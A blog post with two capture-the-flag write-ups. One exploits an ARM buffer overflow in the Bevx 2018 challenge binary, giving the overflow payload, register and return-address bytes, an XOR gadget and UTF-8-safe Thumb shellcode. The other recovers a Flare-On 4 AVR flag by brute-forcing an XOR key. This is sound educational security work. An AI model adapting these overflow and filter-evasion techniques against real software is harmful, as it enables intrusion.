Solving Second Bevx Challenge 2018

The Bevx challenge is a security challenge from Beyond Security for their Bevx conference. I didn’t know about the first challenge, and since I don’t use Twitter every day, I almost missed this second challenge. I only found out about it because a friend shared the Twitter link. It seems that the tweet caused a bit of confusion, because several people asked me: where is the challenge link?

The challenge link is in the picture:

Here it is zoomed in

And this is the link, so you don’t have to retype that:

It also contains a hint: the red text says “ARM buffer overflow”.

The Challenge

Here is the challenge text:

The binary is a ‘server’ which expects incoming connections to it when an incoming connection occurs and a certain ‘protocol’ is implemented it will print out ‘All your base’ and exit. Your challenge is to write an exploit that will cause the program to print out ‘Belong to us!’.

We are given an ARM binary, which we can check using file:

$ file main
main: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=da5353188930ee93a16329bee21858fde73a11d2, stripped

Trying to run this on a Raspberry Pi doesn’t work (presumably because of the memory addresses that they chose for the binary, which has something to do with the main challenge part). Fortunately, I have a Pine64 and it works there. I also tried qemu-arm-static, and it also works fine:

 qemu-arm-static ./main

We can even trace the execution:

qemu-arm-static  -strace -d in_asm,cpu  ./main 2> log.txt

The binary is statically linked and stripped. It means that you will not be able to find the function names in the ELF file. The Qemu output helps me to quickly identify some syscalls.

To get the complete list of syscalls, we can look at the Linux kernel source file arch/arm/include/asm/unistd.h.

Basically, the server creates a listening socket, accepts a connection, allocates memory using mmap at a fixed address (0xdada0000), receives some data into 0xdada0000 (maximum 256 bytes), checks whether it satisfies certain requirements, copies the message to a 128-byte buffer on the stack, and then prints the string “All your base”.

The Protocol and Filter

The first check that we need to get through is the header: there are 8 bytes that we need to get right. This is quite easy: it just compares the first 4 bytes with the result of one function call, and the next 4 bytes with the result of another function call. Without understanding the functions we can find these values easily using Qemu.

First we just send some string such as “AAAAAAAAAAAA”, and the program will just exit. We can then check the values at the point where the comparison is made.

Now sending “;*k%:Zn\x01AAAA” (3b2a6b25 3a5a6e01 41414141; the eighth byte, 0x01, is unprintable) to the server will make the server print “All Your Base” and then exit.
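As a small illustration, the 8-byte header can be built from the two 4-byte values written as hex. This is a sketch in Python 3 (the snippets in this post are Python 2), and it assumes the second value ends with the unprintable byte 0x01, as in the payload used later in this post. The names ch1, ch2, header and message are only for illustration.

```python
# The two 4-byte values the server compares against, written as hex.
ch1 = bytes.fromhex("3b2a6b25")   # b';*k%'
ch2 = bytes.fromhex("3a5a6e01")   # b':Zn' followed by the unprintable byte 0x01
header = ch1 + ch2

# Anything after the header is the message body; "AAAA" is valid UTF-8.
message = header + b"AAAA"
print(message.hex())
```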

The next check is a bit more complicated, but the constants in the listing (0xF0C0C0 0xE08080) help a lot in finding the algorithm. I admit that I was lucky to have worked with UTF-8 related stuff and Unicode in general, so looking at the constants already gave me a vague idea that it might use UTF-8. And Google is always available to confirm this.

A Google search shows that these constants are used in UTF-8 validity checking. If the received characters are a valid UTF-8 string then it will print “All Your Base” and then exit (the string AAAA happens to be a valid UTF-8 string). Sending a string that is not a valid UTF-8 sequence will cause the program to exit without printing “All your base”.

Looking at the first C code in the search result shows that the code is very similar to the one in the disassembly. I didn’t check in detail whether the validation code is exactly the same, but it reminds me of an article in Phrack Magazine: UTF-8 Shellcode (for Intel x86 Architecture) (please read this to understand valid UTF-8 byte sequences). Here is an excerpt from the article about valid sequences:

At this point, I did some testing by sending valid and invalid UTF-8 sequences, and it seems to work as expected: byte sequences that are not valid UTF-8 are rejected, and the server just exits without printing “All Your Base”.
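To pre-check payloads offline, a strict UTF-8 decode can stand in for the server’s filter. This is only a sketch in Python 3: is_valid_utf8 is a hypothetical helper name, and Python’s decoder follows the current standard (it also rejects overlong forms and surrogates), so it may differ from the check in the binary in corner cases.

```python
def is_valid_utf8(data):
    """Return True if data decodes as strict UTF-8 (an approximation of the filter)."""
    try:
        data.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False

# Plain ASCII is always valid UTF-8.
print(is_valid_utf8(b"AAAA"))
# A lead byte must be followed by a continuation byte (0x80-0xBF), not another lead byte.
print(is_valid_utf8(b"\xda\xda"))
# 0xFF never appears in UTF-8.
print(is_valid_utf8(b"\xff"))
```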

Jump to where?

So I moved to the next step: the buffer overflow part. Sending long strings of “HEADER” + “AAAAAA…” will make it crash and the PC is at 0x41414141. So the minimum payload that I need to send to make it crash is:

ch1 = "3b2a6b25".decode("hex")
ch2 = "3a5a6e01".decode("hex")
r2 = "XXXX"
r3 = "YYYY"
ip = "AAAA"

payload = ch1 + ch2 + "A"* 128 + r2 + r3 + ip

It means that I can change the registers r2, r3 and ip. At this point, I thought: well, this should be easy. But it turns out that the addresses chosen by the programmer are devious. Here is the content of /proc/<pid>/maps when the program is running:

00008000-00009000 r-xp 00000000 b3:01 125513             /home/yohanes/main
00d80000-00dfa000 r-xp 00008000 b3:01 125513             /home/yohanes/main
00e01000-00e03000 rwxp 00081000 b3:01 125513             /home/yohanes/main
da000000-da001000 rwxp 00088000 b3:01 125513             /home/yohanes/main
da001000-da024000 rwxp 00000000 00:00 0                  [heap]
dada0000-dada1000 rwxp 00000000 00:00 0
fffcf000-ffff0000 rwxp 00000000 00:00 0                  [stack]
ffff0000-ffff1000 r-xp 00000000 00:00 0                  [vectors]

Note that we are sending bytes in little endian, so sending 0x12 0x34 0x56 0x78 will make us jump to 0x78563412. If we overwrite 4 bytes of the PC, then we can’t go to address: 0xdada0000 (where our buffer is), since 0xda 0xda can never be a part of a valid UTF-8 sequence. We can’t jump directly to our code segment at 0x00d8XXYY - 0x00dfXXYY, because YY XX 0xd8 0x00 - YY XX 0xdf 0x00 also cannot form a valid UTF-8 sequence.

By the same reasoning, we also can’t go to 0x00e0XXYY or to the stack (0xff is not valid anywhere in a UTF-8 sequence). We can only go to the heap, but I was not able to find anything there. I also thought that maybe the count of the received bytes could be made into an instruction that could help us jump to our buffer, but since we are limited to receiving only 256 bytes (so the count is at most 0x0100), I couldn’t find any instruction that would work.
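The address reasoning above can be approximated with a small script. This is a sketch in Python 3 under stated assumptions: can_be_sent, PREFIXES and SUFFIXES are hypothetical names, Python’s strict decoder stands in for the server’s filter, and the surrounding payload is modelled only by trying a few lead-byte prefixes and continuation-byte suffixes around the 4 little-endian address bytes.

```python
import struct
from itertools import product

# Bytes that could legally sit right before or after the address in a payload:
# partial multi-byte sequences the address bytes may complete or be completed by.
PREFIXES = [b"", b"\xc2", b"\xe1", b"\xe1\x80", b"\xf1", b"\xf1\x80", b"\xf1\x80\x80"]
SUFFIXES = [b"", b"\x80", b"\x80\x80", b"\x80\x80\x80", b"\xa0", b"\xa0\x80", b"\xa0\x80\x80"]

def can_be_sent(address):
    """True if the little-endian address bytes fit into some valid UTF-8 string."""
    raw = struct.pack("<I", address)
    for prefix, suffix in product(PREFIXES, SUFFIXES):
        try:
            (prefix + raw + suffix).decode("utf-8")
            return True
        except UnicodeDecodeError:
            continue
    return False

for name, address in [("buffer", 0xDADA0000), ("code", 0x00D87480),
                      ("data", 0x00E01000), ("stack", 0xFFFCF000),
                      ("heap", 0xDA001000)]:
    print(name, hex(address), can_be_sent(address))
```

With these assumptions only the heap address passes, because its trailing 0xda can be completed by a continuation byte that follows it.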

If we overwrite only 2 bytes of the instruction pointer (the 2 least significant bytes), then we can go to 00 D8 XX YY (only addresses with the 0xd8 prefix, not 0xd9-0xdf), but since we only overwrite 2 bytes of the return address, we cannot control the rest of the stack, so we can’t do a deep ROP sequence. I used xrop to find possible sequences that I could use. This took me a while because somehow I missed the eor/blx gadget. This gadget is at 0xd87480. It is perfect: I can control R2 and R3, and the two can be XOR-ed together to create the value 0xdada00xx.

So I chose these numbers:

r2 = "\xc6\x80\x5a\x17"
r3 = "\xe1\x80\x80\xcd"
ip = "\x80\x74" #Jump To d87480

# r2 ^ r3 will result in address 0xdada0027
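The chosen values can be double-checked offline. The following Python 3 sketch unpacks the two register values as little-endian words, XORs them, and confirms that the overflow tail decodes as UTF-8; Python’s strict decoder is used here as a stand-in for the server’s filter, and the variable names are only illustrative.

```python
import struct

r2 = b"\xc6\x80\x5a\x17"
r3 = b"\xe1\x80\x80\xcd"
ip = b"\x80\x74"          # low 2 bytes of the gadget address 0xd87480

# The registers are loaded from the stack as little-endian 32-bit words.
r2_value = struct.unpack("<I", r2)[0]
r3_value = struct.unpack("<I", r3)[0]
target = r2_value ^ r3_value
print(hex(target))        # 0xdada0027

# The tail splits into the sequences c6 80 | 5a | 17 | e1 80 80 | cd 80 | 74.
tail = r2 + r3 + ip
decoded = tail.decode("utf-8")   # raises UnicodeDecodeError if invalid
print(len(decoded))
```

Note that the 0x80 in ip is only acceptable because it completes the two-byte sequence started by the 0xcd at the end of r3.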

I chose an odd address (the least significant bit is 1) because I want to continue in Thumb mode. I will also need the string “Belong to us!\x00” right after the 8-byte header, so the code has to start at address 0x17 at the earliest, but I thought: why not leave some extra space in case I need it for storing something, since at this point I hadn’t constructed the shellcode yet.

As a side note: here I realized that the UTF-8 filtering is not exactly what I expected. A sequence of “0xE1 0x80 0x80 0x74” should be acceptable, but somehow it was not accepted at the end of the string. I didn’t check why, since I can use the sequence in other parts of the string and I had already found the constant that I was looking for.

The Shellcode

So now we need to write the shellcode. Having a debugger helps me a lot. Unfortunately, the gdb on my Pine64 doesn’t support hardware breakpoints. So I made a minimal shellcode: ldr r0, [r0]. Since I know that r0 is set to 0 at 0x0d812a0, this will cause the program to crash because it dereferences address 0x0. When it crashes I can check the register values.

We can use R9, R10, or LR to reference something in the data section (by adding to or subtracting from that register). We can reference something in our buffer using R3. At this point, I have two options: reading the ARM Thumb instruction set reference to check the encoding of every instruction, or just trying my luck to see whether an instruction works. I did a bit of both.

There are several ways to print “Belong to us!”. I can directly call something in the code that uses the “write” syscall, or I can just change the existing “All your base” string in memory and resume execution to have the desired effect (the lengths of these two strings are the same). I think that the second method is “cleaner” since the application will exit cleanly.

The first instructions that I checked were LDR Rx, [Rx] and STR Rx, [Rx], and it turns out that both generate a valid UTF-8 sequence. So I start by setting our register to the address of “Belong to us!”. This was the solution that I sent:

movs r0, r0 
movs r0, r0
str r3, [r3]
movs r2, #8
strb r2, [r3]
ldr r3, [r3]

The first two instructions are just NOPs. I want to change the value 0xdada00xx (the R3 value) to 0xdada0008 (the start of the string “Belong to us!”). I did this by storing r3 to [r3] (which contains the two NOPs, movs r0, r0), setting r2 to #8, and then storing 1 byte to [r3], which overwrites the 0xdada00xx with 0xdada0008. The final ldr then loads the patched value back into r3.

Because I concentrated too much on LDR/STR, I made it too complicated: this much simpler code also works and is a valid UTF-8 sequence.

subs r3, r3, #19

Next is to find the address of the allocated “All your base” string. It is referenced at 0xd810e8, and the difference from 0xd81e34 (the value of r9) is 0xd4c. This is the sequence that I found to subtract 0xd4c from r9. First I load 0xd, shift it left by 8 bits to get 0xd00, and add 0x4c:

movs r2, #0xd
lsls r2, r2, #8
adds r2, #0x4c
negs r2, r2
add r2, r2, r9
ldr r2, [r2] ; r2 now points to variable in heap
ldr r2, [r2] ; r2 now points to the allocated memory

Note: in my original submission I used two 4 bits left shifts for lsls to shift 8 bits because somehow I misread the documentation, I thought the shift immediate value was limited to 3 bits (0-7) when in fact it is 5 bits (0-31).

lsls r2, r2, #4
lsls r2, r2, #4
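The arithmetic of this sequence can be replayed in a few lines of Python 3. This is only a sketch of the register math with 32-bit wraparound, not an emulator; r9_minus and its shifts parameter are hypothetical names, and the r9 value is the one observed above.

```python
MASK32 = 0xFFFFFFFF
R9 = 0x00D81E34  # value of r9 seen in the debugger

def r9_minus(high, low, shifts=(8,)):
    """Replay movs/lsls/adds/negs/add and return the resulting r2."""
    r2 = high                        # movs r2, #high
    for amount in shifts:            # lsls r2, r2, #amount (once or twice)
        r2 = (r2 << amount) & MASK32
    r2 = (r2 + low) & MASK32         # adds r2, #low
    r2 = (-r2) & MASK32              # negs r2, r2
    return (r2 + R9) & MASK32        # add r2, r2, r9

print(hex(r9_minus(0xD, 0x4C)))                  # single 8-bit shift
print(hex(r9_minus(0xD, 0x4C, shifts=(4, 4))))   # two 4-bit shifts, as submitted
```

Both variants give 0xd810e8, which is the address where the pointer to the string is referenced.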

Now the rest is just to copy over the original string. The length of the string including the NUL is 14 bytes, but we can easily copy 16 bytes without a loop (only 4 loads + 4 stores).

ldr r4, [r3]
str r4, [r2]
ldr r4, [r3, 4]
str r4, [r2, 4]
adds r3, r3, #8
adds r2, r2, #8
ldr r4, [r3]
str r4, [r2]
ldr r4, [r3, 4]
str r4, [r2, 4]

I tried to use ldr r4, [r3, 8], but the generated code is not a valid UTF-8 sequence, so I just add 8 to r3 and r2.
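To see why the offset matters, the 16-bit Thumb encoding of this load can be computed by hand. The Python 3 sketch below assumes the standard Thumb LDR (immediate) encoding for low registers; thumb_ldr_imm and is_valid_utf8 are hypothetical helper names, and Python’s strict decoder again stands in for the server’s filter.

```python
import struct

def thumb_ldr_imm(rt, rn, offset):
    """Encode 16-bit Thumb `ldr rt, [rn, #offset]` as little-endian bytes."""
    assert 0 <= rt < 8 and 0 <= rn < 8           # low registers only
    assert offset % 4 == 0 and 0 <= offset <= 124
    opcode = 0x6800 | ((offset // 4) << 6) | (rn << 3) | rt
    return struct.pack("<H", opcode)

def is_valid_utf8(data):
    try:
        data.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False

for offset in (0, 4, 8):
    code = thumb_ldr_imm(4, 3, offset)           # ldr r4, [r3, #offset]
    print(offset, code.hex(), is_valid_utf8(code))
```

With offset 8 the low byte becomes 0x9c, a continuation byte with no lead byte in front of it, so the instruction is rejected unless the preceding byte happens to start a multi-byte sequence.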

And now the last part is to return to 0xd80fff, which is 0xe35 bytes below r9:

movs r2, #0xe
lsls r2, r2, #8
adds r2, #0x35
negs r2, r2
add r2, r2, r9
bx r2

So that’s it: the code will resume as if nothing happened, but now the string has been changed, and then it will close the socket cleanly.

This challenge was quite fun: it looks very simple at first, but is quite challenging. The code that I submitted works well but was not very optimized.

When the challenge was posted it was the Songkran holiday in Thailand. I started working on this challenge more than 24 hours after it was posted, so I was in a hurry to send it quickly, hoping that I might get the second or third prize. I was happily surprised when I found out that I was the first to send the correct solution.

Flare-On 4: Challenge 9 Quick Solution

This is an Arduino (AVR) challenge. You can read the full official solution from FireEye; here I just want to show how we can use “grep” to quickly find the decryption function and get the flag.

At first, I was going to try to understand what this binary does, but before going too deep, I had an idea: this binary is so small, what if I can just find the flag string without looking at the program’s logic? Looking at the strings present in the binary, it is obvious that the flag is not in cleartext, so it must be encrypted somehow.

Most encryption algorithms involve the use of XOR (eor in AVR). Looking at the disassembly, almost all EORs are just clearing a register (e.g. eor r1, r1). There is only one eor, at 0xaee, that is not clearing a register (eor r25, r24), which is the last one in this grep output.

$ avr-objdump -m avr -D remorse.ino.hex |grep eor
      c4:	11 24       	eor	r1, r1
     1ec:	99 27       	eor	r25, r25
     2e6:	99 27       	eor	r25, r25
     340:	11 27       	eor	r17, r17
     59e:	88 27       	eor	r24, r24
     742:	11 24       	eor	r1, r1
     78e:	11 24       	eor	r1, r1
     7f2:	11 24       	eor	r1, r1
     904:	11 24       	eor	r1, r1
     a16:	11 24       	eor	r1, r1
     aee:	98 27       	eor	r25, r24
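The same filtering can be automated so that only the interesting eor remains. This Python 3 sketch assumes the avr-objdump output format shown above; non_clearing_eors and EOR_RE are hypothetical names.

```python
import re

# Matches lines such as "     aee:\t98 27       \teor\tr25, r24".
EOR_RE = re.compile(r"^\s*([0-9a-f]+):.*\beor\s+(r\d+),\s*(r\d+)")

def non_clearing_eors(disassembly):
    """Return (address, dst, src) for every eor whose two operands differ."""
    hits = []
    for line in disassembly.splitlines():
        match = EOR_RE.match(line)
        if match and match.group(2) != match.group(3):
            hits.append((int(match.group(1), 16), match.group(2), match.group(3)))
    return hits

sample = "      c4:\t11 24       \teor\tr1, r1\n     aee:\t98 27       \teor\tr25, r24\n"
for address, dst, src in non_clearing_eors(sample):
    print(hex(address), dst, src)
```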

Looking at the code around it: it is a single loop, with eor and subi. This must be the decrypt loop.

  ae6:       ldi     r26, 0x6C       ; 108
  ae8:       ldi     r27, 0x05       ; 5
  aea:       ldi     r18, 0x00       ; 0

  aec:       ld      r25, Z+
  aee:       eor     r25, r24
  af0:       add     r25, r18
  af2:       st      X+, r25
  af4:       subi    r18, 0xFF       ; 255
  af6:       cpi     r18, 0x17       ; 23
  af8:       brne    .-14            ; 0xaec 

We just need to find the encrypted data pointed to by Z (which is the register pair R31:R30), and r24 (the xor key). Looking a bit further up, we find the code that fills in the encrypted data. It sets Z to the value of Y (the pair R29:R28), clears the memory, and fills it with some bytes.

  a80:   movw    r30, r28        ; Z = Y
  a82:   adiw    r30, 0x01       ; Z++
  a84:   movw    r26, r30        ; X = Z
  a86:   ldi     r25, 0xFF       ; 
  a88:   add     r25, r30        ; 

  a8a:   st      X+, r1
  a8c:   cpse    r25, r26
  a8e:   rjmp    .-6             ; 0xa8a 

  a90:   ldi     r25, 0xB5 
  a92:   std     Y+1, r25  
  a94:   std     Y+2, r25  
  a96:   ldi     r25, 0x86 
  a98:   std     Y+3, r25  
  a9a:   ldi     r25, 0xB4 
  a9c:   std     Y+4, r25  
  a9e:   ldi     r25, 0xF4 
  aa0:   std     Y+5, r25  
  aa2:   ldi     r25, 0xB3 
  aa4:   std     Y+6, r25  
  aa6:   ldi     r25, 0xF1 
  aa8:   std     Y+7, r25  
  aaa:   ldi     r18, 0xB0 
  aac:   std     Y+8, r18  
  aae:   std     Y+9, r18  
  ab0:   std     Y+10, r25 
  ab2:   ldi     r25, 0xED 
  ab4:   std     Y+11, r25 
  ab6:   ldi     r25, 0x80 
  ab8:   std     Y+12, r25 
  aba:   ldi     r25, 0xBB 
  abc:   std     Y+13, r25 
  abe:   ldi     r25, 0x8F 
  ac0:   std     Y+14, r25 
  ac2:   ldi     r25, 0xBF 
  ac4:   std     Y+15, r25 
  ac6:   ldi     r25, 0x8D 
  ac8:   std     Y+16, r25 
  aca:   ldi     r25, 0xC6 
  acc:   std     Y+17, r25 
  ace:   ldi     r25, 0x85 
  ad0:   std     Y+18, r25 
  ad2:   ldi     r25, 0x87 
  ad4:   std     Y+19, r25 
  ad6:   ldi     r25, 0xC0 
  ad8:   std     Y+20, r25 
  ada:   ldi     r25, 0x94 
  adc:   std     Y+21, r25 
  ade:   ldi     r25, 0x81 
  ae0:   std     Y+22, r25 
  ae2:   ldi     r25, 0x8C 
  ae4:   std     Y+23, r25 

Going a bit further up again, we find a ret (return), which means it’s the end of another function/subroutine. It seems that r24 is filled somewhere else by the caller of this decrypt function.

It doesn’t matter: r24 is just an 8-bit register (256 possible values). Translating this to Python, with a brute force loop:

a = "b5b586b4f4b3f1b0b0f1ed80bb8fbf8dc68587c094818c".decode("hex")

for key in range(0, 256):
        s = ''
        for i,c in enumerate(a):
                m = ((ord(c)^key) + i)&0xff
                s = s + chr(m)
        print key, hex(key), s

And since all flags share the same suffix, we can just add a grep:

$ python|strings|grep flare
219 0xdb no_r3m0rs3@flare-on.com

So the flag is no_r3m0rs3@flare-on.com and the key is 219 decimal (0xdb).
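Once the key is known, the loop can be written as a direct decryption. This is a Python 3 sketch (the brute force snippet above is Python 2) that mirrors the AVR loop: XOR each byte with the key, add the byte index, and keep the low 8 bits. The name decrypt is only illustrative.

```python
# The 23 encrypted bytes stored at Y+1 .. Y+23.
encrypted = bytes.fromhex("b5b586b4f4b3f1b0b0f1ed80bb8fbf8dc68587c094818c")

def decrypt(data, key):
    """Mirror of the AVR loop: (byte ^ key) + index, truncated to 8 bits."""
    return "".join(chr(((byte ^ key) + i) & 0xFF) for i, byte in enumerate(data))

print(decrypt(encrypted, 0xDB))   # no_r3m0rs3@flare-on.com
```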